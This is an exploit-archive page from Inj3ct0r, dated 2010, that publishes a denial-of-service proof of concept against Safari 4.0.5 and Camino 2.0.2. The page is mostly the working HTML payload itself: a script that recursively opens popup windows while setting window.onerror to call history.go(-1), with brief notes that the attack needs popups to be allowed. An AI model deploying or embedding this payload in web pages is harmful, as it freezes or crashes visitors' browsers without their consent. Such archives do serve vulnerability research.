Safari 4.0.5 & Camino 2.0.2 history.go() DoS
Posted on 04 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Safari 4.0.5 & Camino 2.0.2 history.go() DoS</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================ Safari 4.0.5 & Camino 2.0.2 history.go() DoS ============================================ <-- Camino 2.0.2 history.go() DoS Found By: Dr_IDE Tested On: Camino 2.0.2 on OSX 10.6.3 Notes: Impact is reduced because user must either have popup blocker off, or accept popups. Tested On: Safari 4.0.5 on OSX 10.6.3 Notes: Impact is reduced because user must either have popup blocker off, or accept popups. --> <html> <title>Dr_IDE - Camino 2.0.2 & Safari 4.0.5 DoS PoC</title> <script> function test(){ window.onerror=new Function("history.go(-1)"); window.open('http://www.exploit-db.com'); test(); } test(); </script> </html> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-04]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>